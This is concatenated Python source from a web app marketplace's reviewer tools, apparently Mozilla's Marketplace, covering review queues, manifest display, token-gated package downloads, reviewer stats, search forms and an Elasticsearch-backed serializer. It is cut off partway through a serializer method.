    apps = _do_sort(request, rqs)
    # Sort key: when the app entered the re-review queue.
    apps = [QueuedApp(app, app.rereviewqueue_set.all()[0].created)
            for app in apps]
    return _queue(request, apps, 'rereview')
@permission_required('Apps', 'ReviewEscalated')
def queue_escalated(request):
    """Queue of escalated apps; restricted to senior reviewers."""
    eqs = EscalationQueue.objects.no_cache().filter(
        addon__type=amo.ADDON_WEBAPP, addon__disabled_by_user=False)
    apps = _do_sort(request, eqs)
    # Sort key: when the app was escalated.
    apps = [QueuedApp(app, app.escalationqueue_set.all()[0].created)
            for app in apps]
    return _queue(request, apps, 'escalated')
@reviewer_required(only='app')
def queue_updates(request):
    """Queue of pending version updates to already-approved packaged apps."""
    excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
                                                                  flat=True)
    # Unlike queue_apps, the addon itself is already approved here; only
    # the new version's files are pending.
    qs = (Version.objects.no_cache().filter(
        files__status=amo.STATUS_PENDING,
        addon__type=amo.ADDON_WEBAPP,
        addon__disabled_by_user=False,
        addon__status__in=amo.WEBAPPS_APPROVED_STATUSES)
        .exclude(addon__id__in=excluded_ids)
        .order_by('nomination', 'created')
        .select_related('addon', 'files').no_transforms())

    apps = _do_sort(request, qs, date_sort='nomination')
    apps = [QueuedApp(app, app.all_versions[0].nomination)
            for app in Webapp.version_and_file_transformer(apps)]

    return _queue(request, apps, 'updates', date_sort='nomination')
@reviewer_required(only='app')
def queue_device(request):
    """
    A device-specific queue matching apps whose required features the
    device supports, based on the 'pro' (feature profile signature)
    query-string parameter. Empty when no signature is supplied.
    """
    if 'pro' in request.GET:
        apps = [QueuedApp(app, app.all_versions[0].nomination)
                for app in device_queue_search(request)]
    else:
        apps = []

    return _queue(request, apps, 'device')
@reviewer_required(only='app')
def queue_moderated(request):
    """Queue for reviewing app reviews."""
    # Only flagged user reviews that still need editor moderation.
    rf = (Review.objects.no_cache()
                .exclude(Q(addon__isnull=True) | Q(reviewflag__isnull=True))
                .filter(addon__type=amo.ADDON_WEBAPP, editorreview=True)
                .order_by('reviewflag__created'))

    page = paginate(request, rf, per_page=20)
    flags = dict(ReviewFlag.FLAGS)
    reviews_formset = ReviewFlagFormSet(request.POST or None,
                                        queryset=page.object_list,
                                        request=request)

    # POST: apply the moderation decisions and reload the queue.
    if reviews_formset.is_valid():
        reviews_formset.save()
        return redirect(reverse('reviewers.apps.queue_moderated'))

    return render(request, 'reviewers/queue.html',
                  context(request, reviews_formset=reviews_formset,
                          tab='moderated', page=page, flags=flags))
def _get_search_form(request):
    """Build an ApiReviewersSearchForm bound to the recognised GET params.

    GET keys that don't correspond to a form field are dropped; with no
    recognised keys the form is returned unbound.
    """
    # Use a throwaway unbound form purely to discover the field names.
    unbound = ApiReviewersSearchForm()
    known = set(f.name for f in unbound.visible_fields())
    known.update(f.name for f in unbound.hidden_fields())
    data = {}
    for key, value in request.GET.items():
        if key in known:
            data[key] = value
    return ApiReviewersSearchForm(data or None)
@permission_required('Apps', 'Review')
def logs(request):
    """Searchable, filterable log of app review activity."""
    data = request.GET.copy()
    # Default the date range to start at the 1st of the current month.
    if not data.get('start') and not data.get('end'):
        today = datetime.date.today()
        data['start'] = datetime.date(today.year, today.month, 1)
    form = forms.ReviewAppLogForm(data)
    approvals = ActivityLog.objects.review_queue(webapp=True)
    if form.is_valid():
        data = form.cleaned_data
        if data.get('start'):
            approvals = approvals.filter(created__gte=data['start'])
        if data.get('end'):
            approvals = approvals.filter(created__lt=data['end'])
        if data.get('search'):
            term = data['search']
            # Free-text search over comments, app name/slug and reviewer.
            approvals = approvals.filter(
                Q(commentlog__comments__icontains=term) |
                Q(applog__addon__name__localized_string__icontains=term) |
                Q(applog__addon__app_slug__icontains=term) |
                Q(user__display_name__icontains=term) |
                Q(user__username__icontains=term)).distinct()
    pager = paginate(request, approvals, 50)
    data = context(request, form=form, pager=pager, ACTION_DICT=amo.LOG_BY_ID,
                   tab='apps')
    return render(request, 'reviewers/logs.html', data)
@reviewer_required
def motd(request):
    """Display the reviewer message-of-the-day; editable with permission."""
    form = None
    motd = unmemoized_get_config('mkt_reviewers_motd')
    # Only users with AppReviewerMOTD:Edit get the editing form.
    if acl.action_allowed(request, 'AppReviewerMOTD', 'Edit'):
        form = MOTDForm(request.POST or None, initial={'motd': motd})
    if form and request.method == 'POST' and form.is_valid():
        set_config(u'mkt_reviewers_motd', form.cleaned_data['motd'])
        messages.success(request, _('Changes successfully saved.'))
        return redirect(reverse('reviewers.apps.motd'))
    data = context(request, form=form)
    return render(request, 'reviewers/motd.html', data)
# TODO: Move these to the validator when they live there someday.
# Permissions that require at least a privileged packaged app.
PRIVILEGED_PERMISSIONS = set([
    'tcp-socket', 'contacts', 'device-storage:pictures',
    'device-storage:videos', 'device-storage:music', 'device-storage:sdcard',
    'browser', 'systemXHR', 'audio-channel-notification',
    'audio-channel-alarm'])
# Permissions that require a certified app (see _get_permissions: a name
# in both sets is classified as 'priv', since that set is checked first).
CERTIFIED_PERMISSIONS = set([
    'camera', 'tcp-socket', 'network-events', 'contacts',
    'device-storage:apps', 'device-storage:pictures',
    'device-storage:videos', 'device-storage:music', 'device-storage:sdcard',
    'sms', 'telephony', 'browser', 'bluetooth', 'mobileconnection', 'power',
    'settings', 'permissions', 'attention', 'webapps-manage',
    'backgroundservice', 'networkstats-manage', 'wifi-manage', 'systemXHR',
    'voicemail', 'deprecated-hwvideo', 'idle', 'time', 'embed-apps',
    'background-sensors', 'cellbroadcast', 'audio-channel-notification',
    'audio-channel-alarm', 'audio-channel-telephony', 'audio-channel-ringer',
    'audio-channel-publicnotification', 'open-remote-window'])
def _get_permissions(manifest):
    """Classify each permission requested by *manifest*.

    Returns a dict mapping permission name to
    ``{'type': 'web'|'priv'|'cert', 'description': ...}``.  ``'web'`` is
    the default; names in PRIVILEGED_PERMISSIONS or CERTIFIED_PERMISSIONS
    are upgraded accordingly (privileged wins when a name is in both).
    """
    permissions = {}
    # Iterate items() once instead of keys() plus a second lookup per perm.
    for perm, details in manifest.get('permissions', {}).items():
        if perm in PRIVILEGED_PERMISSIONS:
            ptype = 'priv'
        elif perm in CERTIFIED_PERMISSIONS:
            ptype = 'cert'
        else:
            ptype = 'web'
        permissions[perm] = {'type': ptype,
                             'description': details.get('description')}
    return permissions
def _get_manifest_json(addon):
    """Return the parsed manifest for the file of *addon*'s latest version."""
    latest_version = addon.versions.latest()
    return addon.get_manifest_json(latest_version.all_files[0])
@any_permission_required([('AppLookup', 'View'), ('Apps', 'Review')])
@addon_view
@json_view
def app_view_manifest(request, addon):
    """Return an app's manifest, escaped, for reviewer display.

    Packaged apps use the stored manifest; hosted apps are fetched live
    from their manifest_url, with any fetch error shown as a traceback.
    """
    headers = {}
    manifest = {}
    success = False
    if addon.is_packaged:
        manifest = _get_manifest_json(addon)
        content = json.dumps(manifest, indent=4)
        success = True
    else:  # Show the hosted manifest_url.
        content, headers = u'', {}
        if addon.manifest_url:
            try:
                # NOTE(review): verify=False disables TLS certificate
                # verification for this fetch -- confirm that's intended.
                req = requests.get(addon.manifest_url, verify=False)
                content, headers = req.content, req.headers
                success = True
            except Exception:
                content = u''.join(traceback.format_exception(*sys.exc_info()))
            else:
                success = True
            try:
                # Reindent the JSON.
                manifest = json.loads(content)
                content = json.dumps(manifest, indent=4)
            except:
                # If it's not valid JSON, just return the content as is.
                pass
    return {
        'content': jinja2.escape(smart_decode(content)),
        'headers': dict((jinja2.escape(k), jinja2.escape(v))
                        for k, v in headers.items()),
        'success': success,
        # Note: We're using `escape_all` on the values here since we know the
        # keys of the nested dict don't come from user input (manifest) and are
        # known safe.
        'permissions': dict((jinja2.escape(k), escape_all(v))
                            for k, v in _get_permissions(manifest).items())
    }
def reviewer_or_token_required(f):
    """Decorator allowing access via Apps:Review permission OR a token.

    A valid single-use token in request.GET grants access (used by the
    APK factory); otherwise the normal login/permission checks apply.
    """
    @functools.wraps(f)
    def wrapper(request, addon, *args, **kw):
        # If there is a 'token' in request.GET we either return 200 or 403.
        # Otherwise we treat it like a normal django view and redirect to a
        # login page or check for Apps:Review permissions.
        allowed = False
        token = request.GET.get('token')
        # Token.pop consumes the token, so each token is single-use.
        if token and Token.pop(token, data={'app_id': addon.id}):
            log.info('Token for app:%s was successfully used' % addon.id)
            allowed = True
        elif not token and not request.user.is_authenticated():
            return redirect_for_login(request)
        elif acl.action_allowed(request, 'Apps', 'Review'):
            allowed = True
        if allowed:
            if token:
                log.info('Token provided for app:%s and all was happy'
                         % addon.id)
            else:
                log.info('Apps:Review (no token) all happy for app:%s'
                         % addon.id)
            return f(request, addon, *args, **kw)
        else:
            if token:
                log.info('Token provided for app:%s but was not valid'
                         % addon.id)
            else:
                log.info('Apps:Review permissions not met for app:%s'
                         % addon.id)
            raise PermissionDenied
    return wrapper
@addon_view
@reviewer_or_token_required
def mini_manifest(request, addon, version_id):
    """Serve the reviewer mini-manifest for one version of a packaged app."""
    token = request.GET.get('token')
    return http.HttpResponse(
        _mini_manifest(addon, version_id, token),
        content_type='application/x-web-app-manifest+json; charset=utf-8')
def _mini_manifest(addon, version_id, token=None):
    """Build the JSON mini-manifest for one version of a packaged app.

    When *token* is truthy a fresh single-use Token is generated and
    appended to package_path so the download can authenticate too.
    Raises Http404 for hosted apps or unknown versions.
    """
    if not addon.is_packaged:
        raise http.Http404
    version = get_object_or_404(addon.versions, pk=version_id)
    file_ = version.all_files[0]
    manifest = addon.get_manifest_json(file_)
    package_path = absolutify(
        reverse('reviewers.signed', args=[addon.app_slug, version.id]))
    if token:
        # Generate a fresh token.
        token = Token(data={'app_id': addon.id})
        token.save()
        package_path = urlparams(package_path, token=token.token)
    data = {
        'name': manifest['name'],
        'version': version.version,
        'size': file_.size,
        'release_notes': version.releasenotes,
        'package_path': package_path,
    }
    # Copy optional keys through from the real manifest when present.
    for key in ['developer', 'icons', 'locales']:
        if key in manifest:
            data[key] = manifest[key]
    return json.dumps(data, cls=JSONEncoder)
@permission_required('Apps', 'Review')
@addon_view
def app_abuse(request, addon):
    """Paginated list of abuse reports filed against *addon*."""
    report_qs = AbuseReport.objects.filter(addon=addon).order_by('-created')
    report_count = report_qs.count()
    page = paginate(request, report_qs, count=report_count)
    ctx = context(request, addon=addon, reports=page, total=report_count)
    return render(request, 'reviewers/abuse.html', ctx)
@addon_view
@reviewer_or_token_required
def get_signed_packaged(request, addon, version_id):
    """Serve the reviewer-signed package for one version of a packaged app.

    Raises Http404 when signing fails and no package path is available.
    """
    version = get_object_or_404(addon.versions, pk=version_id)
    # `file_` (not `file`): avoid shadowing the builtin and match the
    # naming convention used in _mini_manifest.
    file_ = version.all_files[0]
    path = addon.sign_if_packaged(version.pk, reviewer=True)
    if not path:
        raise http.Http404
    log.info('Returning signed package addon: %s, version: %s, path: %s' %
             (addon.pk, version_id, path))
    # ETag is the hex digest part of the file hash ('algo:digest').
    return HttpResponseSendFile(request, path, content_type='application/zip',
                                etag=file_.hash.split(':')[-1])
@permission_required('Apps', 'Review')
def performance(request, username=None):
    """Show review-points totals and breakdowns for a reviewer.

    Regular reviewers may only view their own stats; admins may view any
    reviewer's by username.  Raises Http404 for unauthorized lookups.
    """
    is_admin = acl.action_allowed(request, 'Admin', '%')
    if username:
        if username == request.amo_user.username:
            user = request.amo_user
        elif is_admin:
            user = get_object_or_404(UserProfile, username=username)
        else:
            raise http.Http404
    else:
        user = request.amo_user
    today = datetime.date.today()
    month_ago = today - datetime.timedelta(days=30)
    year_ago = today - datetime.timedelta(days=365)
    total = ReviewerScore.get_total(user)
    totals = ReviewerScore.get_breakdown(user)
    months = ReviewerScore.get_breakdown_since(user, month_ago)
    years = ReviewerScore.get_breakdown_since(user, year_ago)

    def _sum(scores, types):
        # Sum score totals whose addon type is in `types`.
        # (Parameter renamed from `iter` to avoid shadowing the builtin.)
        return sum(s.total for s in scores if s.atype in types)

    breakdown = {
        'month': {
            'addons': _sum(months, amo.GROUP_TYPE_ADDON),
            'apps': _sum(months, amo.GROUP_TYPE_WEBAPP),
        },
        'year': {
            'addons': _sum(years, amo.GROUP_TYPE_ADDON),
            'apps': _sum(years, amo.GROUP_TYPE_WEBAPP),
        },
        'total': {
            'addons': _sum(totals, amo.GROUP_TYPE_ADDON),
            'apps': _sum(totals, amo.GROUP_TYPE_WEBAPP),
        }
    }
    ctx = context(request, **{
        'profile': user,
        'total': total,
        'breakdown': breakdown,
    })
    return render(request, 'reviewers/performance.html', ctx)
@any_permission_required([('Apps', 'Review')])
def leaderboard(request):
    """Render the reviewer points leaderboard."""
    scores = ReviewerScore.all_users_by_score()
    ctx = context(request, scores=scores)
    return render(request, 'reviewers/leaderboard.html', ctx)
@permission_required('Apps', 'Review')
@json_view
def apps_reviewing(request):
    """List the apps currently checked out for review by reviewers."""
    # NOTE(review): @json_view wraps a render() (HTML) response here --
    # confirm the decorator is intentional.
    return render(request, 'reviewers/apps_reviewing.html',
                  context(request,
                          **{'tab': 'reviewing',
                             'apps': AppsReviewing(request).get_apps()}))
@permission_required('Apps', 'Review')
def attachment(request, attachment):
    """
    Serve an attachment directly to the user.

    Returns 404 when the record or the file on disk is missing.
    """
    try:
        a = ActivityLogAttachment.objects.get(pk=attachment)
        full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
                                 a.filepath)
        # Open in binary mode: attachments may be arbitrary files, and text
        # mode can corrupt them on platforms that translate line endings.
        fsock = open(full_path, 'rb')
    except (ActivityLogAttachment.DoesNotExist, IOError,):
        response = http.HttpResponseNotFound()
    else:
        filename = urllib.quote(a.filename())
        response = http.HttpResponse(fsock,
                                     mimetype='application/force-download')
        response['Content-Disposition'] = 'attachment; filename=%s' % filename
        response['Content-Length'] = os.path.getsize(full_path)
    return response
def _retrieve_translation(text, language):
    """Translate *text* into *language* via the Google Translate API.

    Returns (translated_text, response).  translated_text is '' when the
    API payload has an unexpected shape; request errors are logged and
    re-raised.
    """
    try:
        r = requests.get(
            settings.GOOGLE_TRANSLATE_API_URL, params={
                'key': getattr(settings, 'GOOGLE_API_CREDENTIALS', ''),
                'q': text, 'target': language})
    except Exception, e:
        log.error(e)
        raise
    try:
        # The API HTML-escapes the translated text; unescape it.
        translated = (HTMLParser.HTMLParser().unescape(r.json()['data']
                      ['translations'][0]['translatedText']))
    except (KeyError, IndexError):
        translated = ''
    return translated, r
@waffle_switch('reviews-translate')
@permission_required('Apps', 'Review')
def review_translate(request, addon_slug, review_pk, language):
    """Translate a user review for reviewers.

    AJAX requests receive JSON with the translated title/body (status
    mirrors any upstream API failure); other requests are redirected to
    Google Translate.
    """
    review = get_object_or_404(Review, addon__slug=addon_slug, pk=review_pk)
    # The translate API expects a bare language code ('pt-BR' -> 'pt').
    if '-' in language:
        language = language.split('-')[0]
    if request.is_ajax():
        title = ''
        body = ''
        status = 200
        if review.title is not None:
            title, r = _retrieve_translation(review.title, language)
            if r.status_code != 200:
                status = r.status_code
        if review.body is not None:
            body, r = _retrieve_translation(review.body, language)
            if r.status_code != 200:
                status = r.status_code
        return http.HttpResponse(json.dumps({'title': title, 'body': body}),
                                 status=status)
    else:
        return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
            lang=language, text=review.body))
class ReviewingView(ListAPIView):
    """API endpoint listing the apps currently being reviewed."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [GroupPermission('Apps', 'Review')]
    serializer_class = ReviewingSerializer
    def get_queryset(self):
        # AppsReviewing yields dicts; expose just the app objects.
        return [row['app'] for row in AppsReviewing(self.request).get_apps()]
class ReviewersSearchView(SearchView):
    """Reviewer app search API: adds status and reviewer-only filters."""
    cors_allowed_methods = ['get']
    authentication_classes = [RestSharedSecretAuthentication,
                              RestOAuthAuthentication]
    permission_classes = [GroupPermission('Apps', 'Review')]
    form_class = ApiReviewersSearchForm
    serializer_class = ReviewersESAppSerializer
    def search(self, request):
        """Run the ES search; return (paginated serializer, query string)."""
        form_data = self.get_search_data(request)
        query = form_data.get('q', '')
        base_filters = {'type': form_data['type']}
        # 'any' means: don't restrict by status at all.
        if form_data.get('status') != 'any':
            base_filters['status'] = form_data.get('status')
        qs = S(WebappIndexer).filter(**base_filters)
        qs = self.apply_filters(request, qs, data=form_data)
        qs = apply_reviewer_filters(request, qs, data=form_data)
        page = self.paginate_queryset(qs)
        return self.get_pagination_serializer(page), query
def apply_reviewer_filters(request, qs, data=None):
    """Apply reviewer-only filters from cleaned form data to an ES queryset.

    Each filter is only applied when its value is present and not None.
    """
    # Per-version boolean flags live under latest_version in the index.
    for flag in ('has_info_request', 'has_editor_comment'):
        value = data.get(flag)
        if value is not None:
            qs = qs.filter(**{'latest_version.%s' % flag: value})
    escalated = data.get('is_escalated')
    if escalated is not None:
        qs = qs.filter(is_escalated=escalated)
    tarako = data.get('is_tarako')
    if tarako is None:
        return qs
    if tarako:
        return qs.filter(tags='tarako')
    return qs.filter(~F(tags='tarako'))
class ApproveRegion(SlugOrIdMixin, CreateAPIView):
    """
    TODO: Document this API.
    """
    # Approve or reject an app pending review for a specific region; the
    # required permission is derived from the region in the URL.
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    model = Webapp
    slug_field = 'app_slug'
    def get_permissions(self):
        # E.g. region 'cn' requires the 'Apps:ReviewRegionCN' permission.
        region = parse_region(self.request.parser_context['kwargs']['region'])
        region_slug = region.slug.upper()
        return (GroupPermission('Apps', 'ReviewRegion%s' % region_slug),)
    def get_queryset(self):
        region = parse_region(self.request.parser_context['kwargs']['region'])
        return self.model.objects.pending_in_region(region)
    def post(self, request, pk, region, *args, **kwargs):
        app = self.get_object()
        region = parse_region(region)
        form = ApproveRegionForm(request.DATA, app=app, region=region)
        if not form.is_valid():
            raise ParseError(dict(form.errors.items()))
        form.save()
        return Response({'approved': bool(form.cleaned_data['approve'])})
class GenerateToken(SlugOrIdMixin, CreateAPIView):
    """
    This generates a short-lived token to be used by the APK factory service
    for authentication of requests to the reviewer mini-manifest and package.
    """
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = [GroupPermission('Apps', 'Review')]
    model = Webapp
    slug_field = 'app_slug'
    def post(self, request, pk, *args, **kwargs):
        # Create and persist a token tied to this app's id, then return it.
        app = self.get_object()
        token = Token(data={'app_id': app.id})
        token.save()
        log.info('Generated token on app:%s for user:%s' % (
            app.id, request.amo_user.id))
        return Response({'token': token.token})
########NEW FILE########
__FILENAME__ = forms
from django import forms
from tower import ugettext_lazy as _lazy
from addons.models import Category
import amo
from mkt.api.forms import SluggableModelChoiceField
# (value, label) choice tuples used by the search forms below.
ADDON_CHOICES = [(k, k) for k in amo.MKT_ADDON_TYPES_API.keys()]
# Sort options; None means the ES default (relevance) ordering.
SORT_CHOICES = [
    (None, _lazy(u'Relevance')),
    ('popularity', _lazy(u'Popularity')),
    ('downloads', _lazy(u'Weekly Downloads')),
    ('rating', _lazy(u'Top Rated')),
    ('price', _lazy(u'Price')),
    ('created', _lazy(u'Newest')),
    ('reviewed', _lazy(u'Reviewed')),
    ('name', _lazy(u'Name')),
]
# Sorting by price makes no sense for free-only listings.
FREE_SORT_CHOICES = [(k, v) for k, v in SORT_CHOICES if k != 'price']
PRICE_CHOICES = [
    (None, _lazy(u'All')),
    ('free', _lazy(u'Free')),
    ('paid', _lazy(u'Paid')),
]
APP_TYPE_CHOICES = [
    ('', _lazy(u'Any App Type')),
    ('hosted', _lazy(u'Hosted')),
    ('packaged', _lazy(u'Packaged')),
    ('privileged', _lazy(u'Privileged packaged app')),
]
PREMIUM_CHOICES = [
    ('free', _lazy(u'Free')),
    ('free-inapp', _lazy(u'Free with In-app')),
    ('premium', _lazy(u'Premium')),
    ('premium-inapp', _lazy(u'Premium with In-app')),
    ('other', _lazy(u'Other System for In-App')),
]
DEVICE_CHOICES = [
    ('', _lazy(u'Any Device Type')),
    ('desktop', _lazy(u'Desktop')),
    ('mobile', _lazy(u'Mobile')),
    ('tablet', _lazy(u'Tablet')),
    ('firefoxos', _lazy(u'Firefox OS')),
]
# Maps the device form values above to the amo device-type ids stored in ES.
DEVICE_CHOICES_IDS = {
    'desktop': amo.DEVICE_DESKTOP.id,
    'mobile': amo.DEVICE_MOBILE.id,
    'tablet': amo.DEVICE_TABLET.id,
    'firefoxos': amo.DEVICE_GAIA.id,
}
CATEGORY_CHOICES = [
    ('', _lazy(u'All Categories')),
    ('games', _lazy(u'Games')),
    ('books', _lazy(u'Books')),
    ('business', _lazy(u'Business')),
    ('education', _lazy(u'Education')),
    ('entertainment', _lazy(u'Entertainment')),
    ('health-fitness', _lazy(u'Health & Fitness')),
    ('lifestyle', _lazy(u'Lifestyle')),
    ('maps-navigation', _lazy(u'Maps & Navigation')),
    ('music', _lazy(u'Music')),
    ('news-weather', _lazy(u'News & Weather')),
    ('photo-video', _lazy(u'Photo & Video')),
    ('productivity', _lazy(u'Productivity')),
    ('reference', _lazy(u'Reference')),
    ('shopping', _lazy(u'Shopping')),
    ('social', _lazy(u'Social')),
    ('sports', _lazy(u'Sports')),
    ('travel', _lazy(u'Travel')),
    ('utilities', _lazy(u'Utilities'))
]
# Tarako pseudo-categories expand to lists of regular category slugs
# (see ApiSearchForm.clean_cat).
TARAKO_CATEGORIES_MAPPING = {
    'tarako-tools': ['business', 'education', 'productivity',
                     'reference', 'utilities'],
    'tarako-games': ['games'],
    'tarako-lifestyle': ['books', 'entertainment', 'health-fitness',
                         'lifestyle', 'maps-navigation', 'music',
                         'news-weather', 'photo-video', 'shopping',
                         'social', 'sports', 'travel'],
}
TARAKO_CATEGORY_CHOICES = [
    ('tarako-tools', _lazy(u'Tools')),
    ('tarako-games', _lazy(u'Games')),
    ('tarako-lifestyle', _lazy(u'Lifestyle')),
]
# Tags are only available to admins. They are free-form, and we expose them in
# the API, but they are not supposed to be manipulated by users atm, so we only
# allow to search for specific, whitelisted ones.
TAG_CHOICES = [
    ('tarako', 'tarako'),
]
# "Relevance" doesn't make sense for Category listing pages.
LISTING_SORT_CHOICES = SORT_CHOICES[1:]
FREE_LISTING_SORT_CHOICES = [(k, v) for k, v in LISTING_SORT_CHOICES
                             if k != 'price']
SEARCH_PLACEHOLDERS = {'apps': _lazy(u'Search for apps')}
class SimpleSearchForm(forms.Form):
    """Powers the search box on every page."""
    q = forms.CharField(required=False)
    cat = forms.CharField(required=False, widget=forms.HiddenInput)

    def clean_cat(self):
        # Fall back to 'all' when no category was submitted.
        return self.data.get('cat', 'all')

    def placeholder(self, txt=None):
        # Callers may override the default placeholder text.
        if txt:
            return txt
        return SEARCH_PLACEHOLDERS['apps']
class ApiSearchForm(forms.Form):
    """Validates and normalizes the public app-search API parameters."""
    q = forms.CharField(
        required=False, label=_lazy(u'Search'),
        widget=forms.TextInput(attrs={'autocomplete': 'off',
                                      'placeholder': _lazy(u'Search')}))
    type = forms.ChoiceField(required=False, choices=ADDON_CHOICES,
                             label=_lazy(u'Add-on type'))
    cat = forms.ChoiceField(required=False, label=_lazy(u'Categories'),
                            choices=CATEGORY_CHOICES + TARAKO_CATEGORY_CHOICES)
    device = forms.ChoiceField(
        required=False, choices=DEVICE_CHOICES, label=_lazy(u'Device type'))
    premium_types = forms.MultipleChoiceField(
        widget=forms.CheckboxSelectMultiple(), required=False,
        label=_lazy(u'Premium types'), choices=PREMIUM_CHOICES)
    # TODO: Make some fancy `MultipleCommaSeperatedChoiceField` field.
    app_type = forms.MultipleChoiceField(
        required=False, choices=APP_TYPE_CHOICES,
        widget=forms.CheckboxSelectMultiple(), label=_lazy(u'App type'))
    manifest_url = forms.CharField(required=False, label=_lazy('Manifest URL'))
    offline = forms.NullBooleanField(required=False,
                                     label=_lazy('Works offline'))
    languages = forms.CharField(required=False,
                                label=_lazy('Supported languages'))
    sort = forms.MultipleChoiceField(required=False,
                                     choices=LISTING_SORT_CHOICES)
    limit = forms.IntegerField(required=False, widget=forms.HiddenInput())
    tag = forms.ChoiceField(required=False, label=_lazy(u'Tags'),
                            choices=TAG_CHOICES)
    def __init__(self, *args, **kw):
        super(ApiSearchForm, self).__init__(*args, **kw)
        # Default to searching pending apps of type 'app'.
        self.initial.update({
            'type': 'app',
            'status': 'pending',
        })
    def clean_cat(self):
        # If request category is a tarako one, get the corresponding list of
        # slugs, otherwise just build a list with the slug requested.
        if self.cleaned_data['cat']:
            return TARAKO_CATEGORIES_MAPPING.get(self.cleaned_data['cat'],
                                                 [self.cleaned_data['cat']])
        return None
    def clean_type(self):
        # Map the API type name to its amo constant; default ADDON_WEBAPP.
        return amo.MKT_ADDON_TYPES_API.get(self.cleaned_data['type'],
                                           amo.ADDON_WEBAPP)
    def clean_premium_types(self):
        """After cleaned, return a list of ints for the constants."""
        pt_ids = []
        for pt in self.cleaned_data.get('premium_types'):
            pt_id = amo.ADDON_PREMIUM_API_LOOKUP.get(pt)
            if pt_id is not None:
                pt_ids.append(pt_id)
        return pt_ids
    def clean_app_type(self):
        """After cleaned, return a list of ints for the constants."""
        at_ids = []
        for at in self.cleaned_data.get('app_type'):
            at_id = amo.ADDON_WEBAPP_TYPES_LOOKUP.get(at)
            if at_id is not None:
                at_ids.append(at_id)
        return at_ids
########NEW FILE########
__FILENAME__ = helpers
from jingo import register
from . import forms
@register.function
def SimpleSearchForm(data, *args):
    # Template helper exposing the search form to Jinja templates.
    # NOTE(review): extra positional args are accepted but ignored.
    return forms.SimpleSearchForm(data)
########NEW FILE########
__FILENAME__ = middleware
import logging
from django.shortcuts import render
from pyelasticsearch.exceptions import ElasticHttpError
log = logging.getLogger('z.es')
class ElasticsearchExceptionMiddleware(object):
    """Turn Elasticsearch HTTP errors into a 503 "search down" page."""

    def process_exception(self, request, exception):
        # isinstance() replaces issubclass(exception.__class__, ...): same
        # check, idiomatic form. Non-ES exceptions fall through (None).
        if isinstance(exception, ElasticHttpError):
            log.error(u'Elasticsearch error: %s' % exception)
            return render(request, 'search/down.html', status=503)
########NEW FILE########
__FILENAME__ = serializers
from datetime import datetime
from django.conf import settings
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
import mkt
from addons.models import Category, Preview
from amo.helpers import absolutify
from constants.applications import DEVICE_TYPES
from mkt.api.fields import ESTranslationSerializerField
from mkt.submit.serializers import SimplePreviewSerializer
from mkt.webapps.models import Geodata, Webapp
from mkt.webapps.serializers import AppSerializer, SimpleAppSerializer
from mkt.webapps.utils import (dehydrate_content_rating,
dehydrate_descriptors,
dehydrate_interactives)
from versions.models import Version
class ESAppSerializer(AppSerializer):
    """AppSerializer variant fed from Elasticsearch hits instead of the ORM.

    Each ES hit is turned into a detached "fake" Webapp instance (see
    create_fake_app) so the parent serializer machinery can run without
    touching the database.
    """
    # Fields specific to search.
    absolute_url = serializers.SerializerMethodField('get_absolute_url')
    is_offline = serializers.BooleanField()
    reviewed = serializers.DateField()
    # Override previews, because we don't need the full PreviewSerializer.
    previews = SimplePreviewSerializer(many=True, source='all_previews')
    # Override those, because we want a different source. Also, related fields
    # will call self.queryset early if they are not read_only, so force that.
    categories = serializers.SlugRelatedField(read_only=True,
        many=True, slug_field='slug', source='all_categories')
    manifest_url = serializers.CharField(source='manifest_url')
    # Override translations, because we want a different field.
    banner_message = ESTranslationSerializerField(
        source='geodata.banner_message')
    description = ESTranslationSerializerField()
    homepage = ESTranslationSerializerField()
    name = ESTranslationSerializerField()
    release_notes = ESTranslationSerializerField(
        source='current_version.releasenotes')
    support_email = ESTranslationSerializerField()
    support_url = ESTranslationSerializerField()
    class Meta(AppSerializer.Meta):
        fields = AppSerializer.Meta.fields + ['absolute_url', 'is_offline',
                                              'reviewed']
    def __init__(self, *args, **kwargs):
        super(ESAppSerializer, self).__init__(*args, **kwargs)
        # Remove fields that we don't have in ES at the moment.
        self.fields.pop('upsold', None)
        # Set all fields as read_only just in case.
        for field_name in self.fields:
            self.fields[field_name].read_only = True
    @property
    def data(self):
        """
        Returns the serialized data on the serializer.
        """
        # Cached after the first access.
        if self._data is None:
            if self.many:
                self._data = [self.to_native(item) for item in self.object]
            else:
                self._data = self.to_native(self.object)
        return self._data
    def field_to_native(self, obj, field_name):
        # DRF's field_to_native calls .all(), which we want to avoid, so we
        # provide a simplified version that doesn't and just iterates on the
        # object list.
        return [self.to_native(item) for item in obj.object_list]
    def to_native(self, obj):
        # Build the fake app from the raw ES hit, then serialize as usual.
        app = self.create_fake_app(obj._source)
        return super(ESAppSerializer, self).to_native(app)
    def create_fake_app(self, data):
        """Create a fake instance of Webapp and related models from ES data."""
        is_packaged = data['app_type'] != amo.ADDON_WEBAPP_HOSTED
        is_privileged = data['app_type'] == amo.ADDON_WEBAPP_PRIVILEGED
        obj = Webapp(id=data['id'], app_slug=data['app_slug'],
                     is_packaged=is_packaged, type=amo.ADDON_WEBAPP,
                     icon_type='image/png')
        # Set relations and attributes we need on those relations.
        # The properties set on latest_version and current_version differ
        # because we are only setting what the serializer is going to need.
        # In particular, latest_version.is_privileged needs to be set because
        # it's used by obj.app_type_id.
        obj.listed_authors = []
        obj._current_version = Version()
        obj._current_version.addon = obj
        obj._current_version._developer_name = data['author']
        obj._current_version.supported_locales = data['supported_locales']
        obj._current_version.version = data['current_version']
        obj._latest_version = Version()
        obj._latest_version.is_privileged = is_privileged
        obj._geodata = Geodata()
        obj.all_categories = [Category(slug=cat) for cat in data['category']]
        obj.all_previews = [Preview(id=p['id'], modified=p['modified'],
                            filetype=p['filetype']) for p in data['previews']]
        obj._device_types = [DEVICE_TYPES[d] for d in data['device']]
        # Set base attributes on the "fake" app using the data from ES.
        # It doesn't mean they'll get exposed in the serializer output, that
        # depends on what the fields/exclude attributes in Meta.
        for field_name in ('created', 'modified', 'default_locale',
                           'icon_hash', 'is_escalated', 'is_offline',
                           'manifest_url', 'premium_type', 'regions',
